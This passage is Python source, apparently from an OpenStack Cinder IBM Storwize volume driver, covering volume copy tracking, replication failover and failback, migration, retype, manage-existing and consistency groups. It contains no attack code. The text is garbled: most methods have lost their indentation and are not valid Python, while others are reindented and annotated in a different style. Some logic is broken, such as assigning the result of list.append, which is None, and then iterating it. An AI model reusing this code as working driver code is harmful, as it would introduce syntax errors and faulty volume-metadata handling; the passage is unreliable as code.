LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if old_size is None:
old_size = volume['size']
extend_amt = int(new_size) - old_size
ctxt = context.get_admin_context()
rep_mirror_type = self._get_volume_replicated_type_mirror(ctxt,
volume)
rep_status = volume.get("replication_status", None)
target_vol_name = None
if rep_mirror_type and rep_status != "failed-over":
try:
rel_info = self._helpers.get_relationship_info(volume)
self._helpers.delete_relationship(volume)
except Exception as e:
msg = (_('Failed to get remote copy information for '
'%(volume)s. Exception: %(err)s.'), {'volume':
volume['id'],
'err': e})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if rel_info:
target_vol_name = rel_info.get('aux_vdisk_name')
self.replications.get(rep_mirror_type).extend_target_volume(
target_vol_name, extend_amt)
self._helpers.extend_vdisk(volume['name'], extend_amt)
if rep_mirror_type and rep_status != "failed-over":
self.replications.get(rep_mirror_type).create_relationship(
volume, target_vol_name)
LOG.debug('leave: _extend_volume_op: volume %s', volume['id'])
def add_vdisk_copy(self, volume, dest_pool, vol_type):
return self._helpers.add_vdisk_copy(volume, dest_pool,
vol_type, self._state,
self.configuration)
def _add_vdisk_copy_op(self, ctxt, volume, new_op):
metadata = self.db.volume_admin_metadata_get(ctxt.elevated(),
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if curr_ops:
curr_ops_list = [tuple(x.split(':')) for x in curr_ops.split(';')]
new_ops_list = curr_ops_list.append(new_op)
else:
new_ops_list = [new_op]
new_ops_str = ';'.join([':'.join(x) for x in new_ops_list])
self.db.volume_admin_metadata_update(ctxt.elevated(), volume['id'],
{'vdiskcopyops': new_ops_str},
False)
if volume['id'] in self._vdiskcopyops:
self._vdiskcopyops[volume['id']].append(new_op)
else:
self._vdiskcopyops[volume['id']] = [new_op]
# We added the first copy operation, so start the looping call
if len(self._vdiskcopyops) == 1:
self._vdiskcopyops_loop = loopingcall.FixedIntervalLoopingCall(
self._check_volume_copy_ops)
self._vdiskcopyops_loop.start(interval=self.VDISKCOPYOPS_INTERVAL)
    def _rm_vdisk_copy_op(self, ctxt, volume, orig_copy_id, new_copy_id):
        """Forget a completed vdisk copy operation.

        Removes the (orig_copy_id, new_copy_id) pair from the in-memory
        tracking map and from the volume's 'vdiskcopyops' admin metadata,
        stopping the polling loop when no operations remain.  Missing
        entries are logged and ignored.
        """
        try:
            self._vdiskcopyops[volume['id']].remove((orig_copy_id,
                                                     new_copy_id))
            if not len(self._vdiskcopyops[volume['id']]):
                del self._vdiskcopyops[volume['id']]
                # Last operation overall: stop the periodic poller.
                if not len(self._vdiskcopyops):
                    self._vdiskcopyops_loop.stop()
                    self._vdiskcopyops_loop = None
        except KeyError:
            LOG.error(_LE('_rm_vdisk_copy_op: Volume %s does not have any '
                          'registered vdisk copy operations.'), volume['id'])
            return
        except ValueError:
            LOG.error(_LE('_rm_vdisk_copy_op: Volume %(vol)s does not have '
                          'the specified vdisk copy operation: orig=%(orig)s '
                          'new=%(new)s.'),
                      {'vol': volume['id'], 'orig': orig_copy_id,
                       'new': new_copy_id})
            return
        # Mirror the removal into the persisted admin metadata.
        metadata = self.db.volume_admin_metadata_get(ctxt.elevated(),
                                                     volume['id'])
        curr_ops = metadata.get('vdiskcopyops', None)
        if not curr_ops:
            LOG.error(_LE('_rm_vdisk_copy_op: Volume metadata %s does not '
                          'have any registered vdisk copy operations.'),
                      volume['id'])
            return
        curr_ops_list = [tuple(x.split(':')) for x in curr_ops.split(';')]
        try:
            curr_ops_list.remove((orig_copy_id, new_copy_id))
        except ValueError:
            LOG.error(_LE('_rm_vdisk_copy_op: Volume %(vol)s metadata does '
                          'not have the specified vdisk copy operation: '
                          'orig=%(orig)s new=%(new)s.'),
                      {'vol': volume['id'], 'orig': orig_copy_id,
                       'new': new_copy_id})
            return
        if len(curr_ops_list):
            new_ops_str = ';'.join([':'.join(x) for x in curr_ops_list])
            self.db.volume_admin_metadata_update(ctxt.elevated(), volume['id'],
                                                 {'vdiskcopyops': new_ops_str},
                                                 False)
        else:
            # No operations left: drop the metadata key entirely.
            self.db.volume_admin_metadata_delete(ctxt.elevated(), volume['id'],
                                                 'vdiskcopyops')
def promote_replica(self, ctxt, volume):
return self.replication.promote_replica(volume)
def reenable_replication(self, ctxt, volume):
return self.replication.reenable_replication(volume)
def create_replica_test_volume(self, tgt_volume, src_volume):
if src_volume['size'] != tgt_volume['size']:
msg = (_('create_cloned_volume: Source and destination '
'size differ.'))
LOG.error(msg)
raise exception.InvalidInput(message=msg)
replica_status = self.replication.test_replica(tgt_volume,
src_volume)
return replica_status
def get_replication_status(self, ctxt, volume):
replica_status = None
if self.replication:
replica_status = self.replication.get_replication_status(volume)
return replica_status
    def _check_volume_copy_ops(self):
        """Poll pending vdisk copy operations and reap completed ones.

        Invoked by the FixedIntervalLoopingCall started in
        _add_vdisk_copy_op.  For each tracked (orig, new) copy pair whose
        new copy is fully synced, removes the original copy and
        unregisters the operation.
        """
        LOG.debug("Enter: update volume copy status.")
        ctxt = context.get_admin_context()
        # Snapshot the items: _rm_vdisk_copy_op mutates the dict below.
        copy_items = list(self._vdiskcopyops.items())
        for vol_id, copy_ops in copy_items:
            try:
                volume = self.db.volume_get(ctxt, vol_id)
            except Exception:
                # Volume vanished from the DB: drop its pending operations
                # and stop the loop if nothing else is tracked.
                LOG.warning(_LW('Volume %s does not exist.'), vol_id)
                del self._vdiskcopyops[vol_id]
                if not len(self._vdiskcopyops):
                    self._vdiskcopyops_loop.stop()
                    self._vdiskcopyops_loop = None
                continue
            for copy_op in copy_ops:
                try:
                    synced = self._helpers.is_vdisk_copy_synced(volume['name'],
                                                                copy_op[1])
                except Exception:
                    LOG.info(_LI('_check_volume_copy_ops: Volume %(vol)s does '
                                 'not have the specified vdisk copy '
                                 'operation: orig=%(orig)s new=%(new)s.'),
                             {'vol': volume['id'], 'orig': copy_op[0],
                              'new': copy_op[1]})
                else:
                    if synced:
                        self._helpers.rm_vdisk_copy(volume['name'], copy_op[0])
                        self._rm_vdisk_copy_op(ctxt, volume, copy_op[0],
                                               copy_op[1])
        LOG.debug("Exit: update volume copy status.")
# #### V2.1 replication methods #### #
    def failover_host(self, context, volumes, secondary_id=None):
        """Force failover to a secondary replication target.

        When *secondary_id* equals FAILBACK_VALUE the volumes are failed
        back instead.  Volumes that are not of a replicated type are marked
        'error' so users know they have lost access.

        :param context: security context
        :param volumes: volumes managed by this backend
        :param secondary_id: backend_id of the replication target, or
            FAILBACK_VALUE to fail back
        :returns: (target_id, volume_update_list)
        :raises InvalidReplicationTarget: if secondary_id matches no
            configured replication target
        """
        self._validate_replication_enabled()
        if self.FAILBACK_VALUE == secondary_id:
            # In this case the administrator would like to fail back.
            volume_update_list = self._replication_failback(context,
                                                            volumes)
            return None, volume_update_list
        # In this case the administrator would like to fail over.
        failover_target = None
        for target in self._replication_targets:
            if target['backend_id'] == secondary_id:
                failover_target = target
                break
        if not failover_target:
            msg = _("A valid secondary target MUST be specified in order "
                    "to failover.")
            LOG.error(msg)
            raise exception.InvalidReplicationTarget(reason=msg)
        target_id = failover_target['backend_id']
        volume_update_list = []
        for volume in volumes:
            rep_type = self._get_volume_replicated_type(context, volume)
            if rep_type:
                replication = self.replications.get(rep_type)
                if replication.target.get('backend_id') == target_id:
                    # Check if the target backend matches the replication type.
                    # If so, fail over the volume.
                    try:
                        replication.failover_volume_host(context,
                                                         volume, target_id)
                        volume_update_list.append(
                            {'volume_id': volume['id'],
                             'updates': {'replication_status': 'failed-over'}})
                    except exception.VolumeDriverException:
                        msg = (_LE('Unable to failover to the secondary. '
                                   'Please make sure that the secondary '
                                   'back-end is ready.'))
                        LOG.error(msg)
                        volume_update_list.append(
                            {'volume_id': volume['id'],
                             'updates': {'replication_status': 'error'}})
            else:
                # If the volume is not of replicated type, we need to
                # force the status into error state so a user knows they
                # do not have access to the volume.
                volume_update_list.append(
                    {'volume_id': volume['id'],
                     'updates': {'status': 'error'}})
        return target_id, volume_update_list
def _is_host_ready_for_failback(self, ctxt, volumes):
valid_sync_status = ('consistent_synchronized', 'consistent_stopped',
'synchronized', 'idling')
# Check the status of each volume to see if it is in
# a consistent status.
for volume in volumes:
rep_type = self._get_volume_replicated_type(ctxt, volume)
if rep_type:
replication = self.replications.get(rep_type)
if replication:
status = replication.get_relationship_status(volume)
# We need to make sure of that all the volumes are
# in the valid status to trigger a successful
# fail-back. False will be be returned even if only
# one volume is not ready.
if status not in valid_sync_status:
return False
else:
return False
else:
return False
return True
def _replication_failback(self, ctxt, volumes):
"""Fail back all the volume on the secondary backend."""
if not self._is_host_ready_for_failback(ctxt, volumes):
msg = _("The host is not ready to be failed back. Please "
"resynchronize the volumes and resume replication on the "
"Storwize backends.")
LOG.error(msg)
raise exception.VolumeDriverException(data=msg)
volume_update_list = []
for volume in volumes:
rep_type = self._get_volume_replicated_type(ctxt, volume)
if rep_type:
replication = self.replications.get(rep_type)
replication.replication_failback(volume)
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'replication_status': 'enabled'}})
else:
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'status': 'available'}})
return volume_update_list
def _validate_replication_enabled(self):
if not self._replication_enabled:
msg = _("Issuing a fail-over failed because replication is "
"not properly configured.")
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def _validate_volume_rep_type(self, ctxt, volume):
rep_type = self._get_volume_replicated_type(ctxt, volume)
if not rep_type:
msg = (_("Volume %s is not of replicated type. "
"This volume needs to be of a volume type "
"with the extra spec replication_enabled set "
"to '<is> True' to support replication "
"actions."), volume['id'])
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
if not self._replication_enabled:
msg = _("The back-end where the volume is created "
"does not have replication enabled.")
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return rep_type
def _get_volume_replicated_type_mirror(self, ctxt, volume):
rep_type = self._get_volume_replicated_type(ctxt, volume)
if rep_type in self.VALID_REP_TYPES:
return rep_type
else:
return None
def _get_specs_replicated_type(self, volume_type):
replication_type = None
extra_specs = volume_type.get("extra_specs", {})
rep_val = extra_specs.get('replication_enabled')
if rep_val == "<is> True":
replication_type = extra_specs.get('replication_type',
self.GLOBAL)
# The format for replication_type in extra spec is in
# "<in> global". Otherwise, the code will
# not reach here.
if replication_type != self.GLOBAL:
# Pick up the replication type specified in the
# extra spec from the format like "<in> global".
replication_type = replication_type.split()[1]
if replication_type not in self.VALID_REP_TYPES:
replication_type = None
return replication_type
def _get_volume_replicated_type(self, ctxt, volume):
replication_type = None
if volume.get("volume_type_id"):
volume_type = volume_types.get_volume_type(
ctxt, volume["volume_type_id"])
replication_type = self._get_specs_replicated_type(volume_type)
return replication_type
def _do_replication_setup(self):
replication_devices = self.configuration.replication_device
if replication_devices:
replication_targets = []
for dev in replication_devices:
remote_array = {}
remote_array['managed_backend_name'] = (
dev.get('managed_backend_name'))
if not remote_array['managed_backend_name']:
raise exception.InvalidConfigurationValue(
option='managed_backend_name',
value=remote_array['managed_backend_name'])
rep_mode = dev.get('replication_mode')
remote_array['replication_mode'] = rep_mode
remote_array['san_ip'] = (
dev.get('san_ip'))
remote_array['backend_id'] = (
dev.get('backend_id'))
remote_array['san_login'] = (
dev.get('san_login'))
remote_array['san_password'] = (
dev.get('san_password'))
remote_array['pool_name'] = (
dev.get('pool_name'))
replication_targets.append(remote_array)
# Each replication type will have a coresponding replication.
self.create_replication_types(replication_targets)
if len(self._supported_replication_types) > 0:
self._replication_enabled = True
def create_replication_types(self, replication_targets):
for target in replication_targets:
rep_type = target['replication_mode']
if (rep_type in self.VALID_REP_TYPES
and rep_type not in self.replications.keys()):
replication = self.replication_factory(rep_type, target)
try:
replication.establish_target_partnership()
except exception.VolumeDriverException:
msg = (_LE('The replication mode of %(type)s has not '
'successfully established partnership '
'with the replica Storwize target %(stor)s.'),
{'type': rep_type,
'stor': target['backend_id']})
LOG.error(msg)
continue
self.replications[rep_type] = replication
self._replication_targets.append(target)
self._supported_replication_types.append(rep_type)
def replication_factory(self, replication_type, rep_target):
"""Use replication methods for the requested mode."""
if replication_type == self.GLOBAL:
return storwize_rep.StorwizeSVCReplicationGlobalMirror(
self, rep_target, StorwizeHelpers)
if replication_type == self.METRO:
return storwize_rep.StorwizeSVCReplicationMetroMirror(
self, rep_target, StorwizeHelpers)
    def migrate_volume(self, ctxt, volume, host):
        """Migrate directly if source and dest are managed by same storage.

        We create a new vdisk copy in the desired pool, and add the original
        vdisk copy to the admin_metadata of the volume to be deleted. The
        deletion will occur using a periodic task once the new copy is synced.

        :param ctxt: Context
        :param volume: A dictionary describing the volume to migrate
        :param host: A dictionary describing the host to migrate to, where
                     host['host'] is its name, and host['capabilities'] is a
                     dictionary of its reported capabilities.
        :returns: (True, None) when the copy was scheduled, (False, None)
                  when the destination is not reachable from this backend
        """
        LOG.debug('enter: migrate_volume: id=%(id)s, host=%(host)s',
                  {'id': volume['id'], 'host': host['host']})
        false_ret = (False, None)
        dest_pool = self._helpers.can_migrate_to_host(host, self._state)
        if dest_pool is None:
            return false_ret
        ctxt = context.get_admin_context()
        volume_type_id = volume['volume_type_id']
        if volume_type_id is not None:
            vol_type = volume_types.get_volume_type(ctxt, volume_type_id)
        else:
            vol_type = None
        # Flush any already-finished copy operations before adding a new one.
        self._check_volume_copy_ops()
        # NOTE(review): add_vdisk_copy is given the vdisk name, not the
        # volume dict, matching the retype() call site.
        new_op = self.add_vdisk_copy(volume['name'], dest_pool, vol_type)
        self._add_vdisk_copy_op(ctxt, volume, new_op)
        LOG.debug('leave: migrate_volume: id=%(id)s, host=%(host)s',
                  {'id': volume['id'], 'host': host['host']})
        return (True, None)
def retype(self, ctxt, volume, new_type, diff, host):
"""Convert the volume to be of the new type.
Returns a boolean indicating whether the retype occurred.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param new_type: A dictionary describing the volume type to convert to
:param diff: A dictionary with the difference between the two types
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
def retype_iogrp_property(volume, new, old):
if new != old:
self._helpers.change_vdisk_iogrp(volume['name'],
self._state, (new, old))
LOG.debug('enter: retype: id=%(id)s, new_type=%(new_type)s,'
'diff=%(diff)s, host=%(host)s', {'id': volume['id'],
'new_type': new_type,
'diff': diff,
'host': host})
no_copy_keys = ['warning', 'autoexpand', 'easytier']
copy_keys = ['rsize', 'grainsize', 'compression']
all_keys = no_copy_keys + copy_keys
old_opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_matadata'))
new_opts = self._get_vdisk_params(new_type['id'],
volume_type=new_type)
# Check if retype affects volume replication
model_update = None
old_type_replication = old_opts.get('replication', False)
new_type_replication = new_opts.get('replication', False)
# Delete replica if needed
if old_type_replication and not new_type_replication:
self.replication.delete_replica(volume)
model_update = {'replication_status': 'disabled',
'replication_driver_data': None,
'replication_extended_status': None}
vdisk_changes = []
need_copy = False
for key in all_keys:
if old_opts[key] != new_opts[key]:
if key in copy_keys:
need_copy = True
break
elif key in no_copy_keys:
vdisk_changes.append(key)
if (utils.extract_host(volume['host'], 'pool') !=
utils.extract_host(host['host'], 'pool')):
need_copy = True
if need_copy:
self._check_volume_copy_ops()
dest_pool = self._helpers.can_migrate_to_host(host, self._state)
if dest_pool is None:
return False
# If volume is replicated, can't copy
if new_type_replication:
msg = (_('Unable to retype: Current action needs volume-copy,'
' it is not allowed when new type is replication.'
' Volume = %s'), volume['id'])
raise exception.VolumeDriverException(message=msg)
retype_iogrp_property(volume,
new_opts['iogrp'],
old_opts['iogrp'])
try:
new_op = self.add_vdisk_copy(volume['name'],
dest_pool,
new_type)
self._add_vdisk_copy_op(ctxt, volume, new_op)
except exception.VolumeDriverException:
# roll back changing iogrp property
retype_iogrp_property(volume, old_opts['iogrp'],
new_opts['iogrp'])
msg = (_('Unable to retype: A copy of volume %s exists. '
'Retyping would exceed the limit of 2 copies.'),
volume['id'])
raise exception.VolumeDriverException(message=msg)
else:
retype_iogrp_property(volume, new_opts['iogrp'], old_opts['iogrp'])
self._helpers.change_vdisk_options(volume['name'], vdisk_changes,
new_opts, self._state)
if new_opts['qos']:
# Add the new QoS setting to the volume. If the volume has an
# old QoS setting, it will be overwritten.
self._helpers.update_vdisk_qos(volume['name'], new_opts['qos'])
elif old_opts['qos']:
# If the old_opts contain QoS keys, disable them.
self._helpers.disable_vdisk_qos(volume['name'], old_opts['qos'])
# Add replica if needed
if not old_type_replication and new_type_replication:
model_update = self.replication.create_replica(ctxt, volume,
new_type)
LOG.debug('exit: retype: ild=%(id)s, new_type=%(new_type)s,'
'diff=%(diff)s, host=%(host)s', {'id': volume['id'],
'new_type': new_type,
'diff': diff,
'host': host['host']})
return True, model_update
def update_migrated_volume(self, ctxt, volume, new_volume,
original_volume_status):
"""Return model update from Storwize for migrated volume.
This method should rename the back-end volume name(id) on the
destination host back to its original name(id) on the source host.
:param ctxt: The context used to run the method update_migrated_volume
:param volume: The original volume that was migrated to this backend
:param new_volume: The migration volume object that was created on
this backend as part of the migration process
:param original_volume_status: The status of the original volume
:returns: model_update to update DB with any needed changes
"""
current_name = CONF.volume_name_template % new_volume['id']
original_volume_name = CONF.volume_name_template % volume['id']
try:
self._helpers.rename_vdisk(current_name, original_volume_name)
except exception.VolumeBackendAPIException:
LOG.error(_LE('Unable to rename the logical volume '
'for volume: %s'), volume['id'])
return {'_name_id': new_volume['_name_id'] or new_volume['id']}
# If the back-end name(id) for the volume has been renamed,
# it is OK for the volume to keep the original name(id) and there is
# no need to use the column "_name_id" to establish the mapping
# relationship between the volume id and the back-end volume
# name(id).
# Set the key "_name_id" to None for a successful rename.
model_update = {'_name_id': None}
return model_update
    def manage_existing(self, volume, ref):
        """Manages an existing vdisk.

        Renames the vdisk to match the expected name for the volume.
        Error checking done by manage_existing_get_size is not repeated -
        if we got here then we have a vdisk that isn't in use (or we don't
        care if it is in use).

        :param volume: Cinder volume that will adopt the vdisk
        :param ref: driver-specific reference identifying the vdisk
        :raises ManageExistingVolumeTypeMismatch: if the vdisk's I/O group,
            provisioning mode, compression or pool conflict with the
            requested volume type or host
        """
        # Check that the reference is valid
        vdisk = self._manage_input_check(ref)
        vdisk_io_grp = self._helpers.get_volume_io_group(vdisk['name'])
        if vdisk_io_grp not in self._state['available_iogrps']:
            msg = (_("Failed to manage existing volume due to "
                     "the volume to be managed is not in a valid "
                     "I/O group."))
            raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
        if volume['volume_type_id']:
            opts = self._get_vdisk_params(volume['volume_type_id'],
                                          volume_metadata=
                                          volume.get('volume_metadata'))
            vdisk_copy = self._helpers.get_vdisk_copy_attrs(vdisk['name'], '0')
            # Thin/thick provisioning must agree: rsize == -1 means the
            # chosen type is fully allocated (thick).
            if vdisk_copy['autoexpand'] == 'on' and opts['rsize'] == -1:
                msg = (_("Failed to manage existing volume due to "
                         "the volume to be managed is thin, but "
                         "the volume type chosen is thick."))
                raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
            if not vdisk_copy['autoexpand'] and opts['rsize'] != -1:
                msg = (_("Failed to manage existing volume due to "
                         "the volume to be managed is thick, but "
                         "the volume type chosen is thin."))
                raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
            # Compression settings must also match the chosen type.
            if (vdisk_copy['compressed_copy'] == 'no' and
                    opts['compression']):
                msg = (_("Failed to manage existing volume due to the "
                         "volume to be managed is not compress, but "
                         "the volume type chosen is compress."))
                raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
            if (vdisk_copy['compressed_copy'] == 'yes' and
                    not opts['compression']):
                msg = (_("Failed to manage existing volume due to the "
                         "volume to be managed is compress, but "
                         "the volume type chosen is not compress."))
                raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
            # NOTE(review): the message below reads vdisk['IO_group_name']
            # while the comparison uses vdisk_io_grp from
            # get_volume_io_group() — presumably equivalent; confirm the
            # fields available on the ref'd vdisk.
            if vdisk_io_grp != opts['iogrp']:
                msg = (_("Failed to manage existing volume due to "
                         "I/O group mismatch. The I/O group of the "
                         "volume to be managed is %(vdisk_iogrp)s. I/O group"
                         "of the chosen type is %(opt_iogrp)s.") %
                       {'vdisk_iogrp': vdisk['IO_group_name'],
                        'opt_iogrp': opts['iogrp']})
                raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
        pool = utils.extract_host(volume['host'], 'pool')
        if vdisk['mdisk_grp_name'] != pool:
            msg = (_("Failed to manage existing volume due to the "
                     "pool of the volume to be managed does not "
                     "match the backend pool. Pool of the "
                     "volume to be managed is %(vdisk_pool)s. Pool "
                     "of the backend is %(backend_pool)s.") %
                   {'vdisk_pool': vdisk['mdisk_grp_name'],
                    'backend_pool':
                        self.configuration.storwize_svc_volpool_name})
            raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
        # All checks passed: adopt the vdisk under the Cinder volume name.
        self._helpers.rename_vdisk(vdisk['name'], volume['name'])
def manage_existing_get_size(self, volume, ref):
"""Return size of an existing Vdisk for manage_existing.
existing_ref is a dictionary of the form:
{'source-id': <uid of disk>} or
{'source-name': <name of the disk>}
Optional elements are:
'manage_if_in_use': True/False (default is False)
If set to True, a volume will be managed even if it is currently
attached to a host system.
"""
# Check that the reference is valid
vdisk = self._manage_input_check(ref)
# Check if the disk is in use, if we need to.
manage_if_in_use = ref.get('manage_if_in_use', False)
if (not manage_if_in_use and
self._helpers.is_vdisk_in_use(vdisk['name'])):
reason = _('The specified vdisk is mapped to a host.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
return int(math.ceil(float(vdisk['capacity']) / units.Gi))
def unmanage(self, volume):
"""Remove the specified volume from Cinder management."""
pass
def get_volume_stats(self, refresh=False):
    """Return cached volume stats, refreshing them when needed.

    Stats are recomputed when ``refresh`` is True or when no stats
    have been gathered yet.
    """
    if refresh or not self._stats:
        self._update_volume_stats()
    return self._stats
def create_consistencygroup(self, context, group):
    """Create a consistency group (DB-only until cg-snapshot time).

    The backend CG is only materialized when a cg-snapshot is taken;
    until then the volume/CG relationship lives in the Cinder DB.
    """
    LOG.debug("Creating consistency group.")
    return {'status': fields.ConsistencyGroupStatus.AVAILABLE}
def delete_consistencygroup(self, context, group, volumes):
    """Deletes a consistency group.
    IBM Storwize will delete the volumes of the CG.

    Returns (model_update, volumes): overall CG status plus the
    per-volume status list, with failed deletions marked.
    """
    LOG.debug("Deleting consistency group.")
    model_update = {}
    model_update['status'] = fields.ConsistencyGroupStatus.DELETED
    # Re-query the DB so we operate on the authoritative member list,
    # not the (possibly stale) ``volumes`` argument.
    volumes = self.db.volume_get_all_by_group(context, group['id'])
    for volume in volumes:
        try:
            # Second arg — presumably "force delete"; confirm against
            # the helper's signature.
            self._helpers.delete_vdisk(volume['name'], True)
            volume['status'] = 'deleted'
        except exception.VolumeBackendAPIException as err:
            # Keep deleting remaining members, but flag the CG overall.
            volume['status'] = 'error_deleting'
            if model_update['status'] != 'error_deleting':
                model_update['status'] = 'error_deleting'
            LOG.error(_LE("Failed to delete the volume %(vol)s of CG. "
                          "Exception: %(exception)s."),
                      {'vol': volume['name'], 'exception': err})
    return model_update, volumes
def update_consistencygroup(self, ctxt, group, add_volumes,
                            remove_volumes):
    """Add/remove volume(s) to/from an existing consistency group.

    Membership is tracked only in the Cinder DB, so no backend work is
    required; returning three Nones lets the manager update its records.
    """
    LOG.debug("Updating consistency group.")
    return None, None, None
def create_consistencygroup_from_src(self, context, group, volumes,
                                     cgsnapshot=None, snapshots=None,
                                     source_cg=None, source_vols=None):
    """Creates a consistencygroup from source.
    :param context: the context of the caller.
    :param group: the dictionary of the consistency group to be created.
    :param volumes: a list of volume dictionaries in the group.
    :param cgsnapshot: the dictionary of the cgsnapshot as source.
    :param snapshots: a list of snapshot dictionaries in the cgsnapshot.
    :param source_cg: the dictionary of a consistency group as source.
    :param source_vols: a list of volume dictionaries in the source_cg.
    :return model_update, volumes_model_update
    """
    LOG.debug('Enter: create_consistencygroup_from_src.')
    # Exactly one source pair must be supplied: a cg-snapshot or a CG.
    if cgsnapshot and snapshots:
        cg_name = 'cg-' + cgsnapshot.id
        sources = snapshots
    elif source_cg and source_vols:
        cg_name = 'cg-' + source_cg.id
        sources = source_vols
    else:
        error_msg = _("create_consistencygroup_from_src must be "
                      "creating from a CG snapshot, or a source CG.")
        raise exception.InvalidInput(reason=error_msg)
    LOG.debug('create_consistencygroup_from_src: cg_name %(cg_name)s'
              ' %(sources)s', {'cg_name': cg_name, 'sources': sources})
    # A FlashCopy consistency group drives the backend copy.
    self._helpers.create_fc_consistgrp(cg_name)
    timeout = self.configuration.storwize_svc_flashcopy_timeout
    model_update, snapshots_model = (
        self._helpers.create_cg_from_source(group,
                                            cg_name,
                                            sources,
                                            volumes,
                                            self._state,
                                            self.configuration,
                                            timeout))
    LOG.debug("Leave: create_consistencygroup_from_src.")
    return model_update, snapshots_model
def create_cgsnapshot(self, ctxt, cgsnapshot, snapshots):
    """Create a cgsnapshot via a FlashCopy consistency group."""
    # The cgsnapshot id doubles as the backend CG name.
    fc_cg_name = 'cg_snap-' + cgsnapshot['id']
    self._helpers.create_fc_consistgrp(fc_cg_name)
    # Fetch the authoritative snapshot list from the DB.
    snapshots = self.db.snapshot_get_all_for_cgsnapshot(
        ctxt, cgsnapshot['id'])
    return self._helpers.run_consistgrp_snapshots(
        fc_cg_name,
        snapshots,
        self._state,
        self.configuration,
        self.configuration.storwize_svc_flashcopy_timeout)
def delete_cgsnapshot(self, context, cgsnapshot, snapshots):
    """Delete a cgsnapshot and its per-volume snapshots."""
    # Same naming scheme as create_cgsnapshot().
    fc_cg_name = 'cg_snap-' + cgsnapshot['id']
    snapshots = self.db.snapshot_get_all_for_cgsnapshot(
        context, cgsnapshot['id'])
    return self._helpers.delete_consistgrp_snapshots(fc_cg_name,
                                                     snapshots)
def get_pool(self, volume):
    """Return the backend pool (mdisk group) hosting ``volume``."""
    attrs = self._helpers.get_vdisk_attributes(volume['name'])
    if attrs is None:
        msg = (_('get_pool: Failed to get attributes for volume '
                 '%s') % volume['name'])
        LOG.error(msg)
        raise exception.VolumeDriverException(message=msg)
    return attrs['mdisk_grp_name']
def _update_volume_stats(self):
    """Retrieve stats info from the volume group and cache in self._stats."""
    LOG.debug("Updating volume stats.")
    data = {}
    data['vendor_name'] = 'IBM'
    data['driver_version'] = self.VERSION
    data['storage_protocol'] = self.protocol
    data['multiattach'] = (self.configuration.
                           storwize_svc_multihostmap_enabled)
    backend_name = self.configuration.safe_get('volume_backend_name')
    data['volume_backend_name'] = (backend_name or
                                   self._state['system_name'])
    # Note: the redundant data['pools'] = [] initialization was removed;
    # the list is built directly below.
    data['pools'] = [self._build_pool_stats(pool)
                     for pool in
                     self.configuration.storwize_svc_volpool_name]
    data['replication'] = self._replication_enabled
    data['replication_enabled'] = self._replication_enabled
    # Bug fix: a stray trailing comma previously wrapped the targets list
    # in a one-element tuple, breaking scheduler consumers of this key.
    data['replication_targets'] = self._get_replication_targets()
    self._stats = data
def _build_pool_stats(self, pool):
    """Build pool status

    Returns a stats dict for ``pool``; empty when the backend reports
    no data for the pool.  Raises VolumeBackendAPIException when the
    backend query itself fails.
    """
    QoS_support = True
    pool_stats = {}
    try:
        pool_data = self._helpers.get_pool_attrs(pool)
        if pool_data:
            # Easy Tier counts as enabled in both 'on' and 'auto' modes.
            easy_tier = pool_data['easy_tier'] in ['on', 'auto']
            # Backend reports capacities in bytes; convert to GiB.
            total_capacity_gb = float(pool_data['capacity']) / units.Gi
            free_capacity_gb = float(pool_data['free_capacity']) / units.Gi
            allocated_capacity_gb = (float(pool_data['used_capacity']) /
                                     units.Gi)
            location_info = ('StorwizeSVCDriver:%(sys_id)s:%(pool)s' %
                             {'sys_id': self._state['system_id'],
                              'pool': pool_data['name']})
            pool_stats = {
                'pool_name': pool_data['name'],
                'total_capacity_gb': total_capacity_gb,
                'free_capacity_gb': free_capacity_gb,
                'allocated_capacity_gb': allocated_capacity_gb,
                'compression_support': self._state['compression_enabled'],
                'reserved_percentage':
                    self.configuration.reserved_percentage,
                'QoS_support': QoS_support,
                'consistencygroup_support': True,
                'location_info': location_info,
                'easytier_support': easy_tier
            }
            # Advertise replication details when v2 replication is on;
            # otherwise fall back to the legacy replication object.
            if self._replication_enabled:
                pool_stats.update({
                    'replication_enabled': self._replication_enabled,
                    'replication_type': self._supported_replication_types,
                    'replication_targets': self._get_replication_targets(),
                    'replication_count': len(self._replication_targets)
                })
            elif self.replication:
                pool_stats.update(self.replication.get_replication_info())
    except exception.VolumeBackendAPIException:
        msg = _('Failed getting details for pool %s.') % pool
        raise exception.VolumeBackendAPIException(data=msg)
    return pool_stats
def _get_replication_targets(self):
return [target['backend_id'] for target in self._replication_targets]
def _manage_input_check(self, ref):
    """Resolve a manage_existing reference to a backend vdisk.

    Accepts {'source-name': <vdisk name>} or {'source-id': <vdisk UID>};
    raises ManageExistingInvalidReference for any other shape or when
    no matching vdisk exists.
    """
    if 'source-name' in ref:
        manage_source = ref['source-name']
        vdisk = self._helpers.get_vdisk_attributes(manage_source)
    elif 'source-id' in ref:
        manage_source = ref['source-id']
        vdisk = self._helpers.vdisk_by_uid(manage_source)
    else:
        raise exception.ManageExistingInvalidReference(
            existing_ref=ref,
            reason=_('Reference must contain source-id or '
                     'source-name element.'))
    if vdisk is None:
        raise exception.ManageExistingInvalidReference(
            existing_ref=ref,
            reason=(_('No vdisk with the UID specified by ref %s.')
                    % manage_source))
    return vdisk
| [
"yongle.li@gmail.com"
] | yongle.li@gmail.com |
